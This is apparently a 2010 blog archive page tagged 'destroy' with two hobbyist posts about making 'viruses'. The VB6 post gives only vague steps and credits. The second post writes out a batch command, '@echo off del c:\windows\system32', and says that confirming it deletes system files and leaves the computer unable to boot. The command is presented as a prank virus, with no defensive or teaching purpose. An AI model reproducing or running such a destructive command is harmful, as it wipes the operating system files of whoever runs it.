Tag: destroy
How to make a virus with VB6
by Installer on Apr.04, 2010, under Vbscript
How to make a virus with vb6 there are lots of ways for doing this but i made it with form load by double clicking the form load and putting the code i put Www.Underworld-wolf.page.tl Credits: 90% www.underworld-wolf.blogspot.com and 10% Shell tutorials
Related posts
VBS Virus
by Installer on Apr.03, 2010, under Vbscript
My first video.. I’m making a VBS file which is detected as malware (false positive). The script is: @echo off del c:\windows\system32 Edit: The virus doesn’t delete system32 by just opening the file. You will get a command prompt asking to confirm or not (y/n) and if you choose yes, it will delete files in system32. Most of them are access denied, but it will still make your pc unable to start again whenever you shutdown. Update: Sorry for the mistake. It’s a batch file, not a vbs file.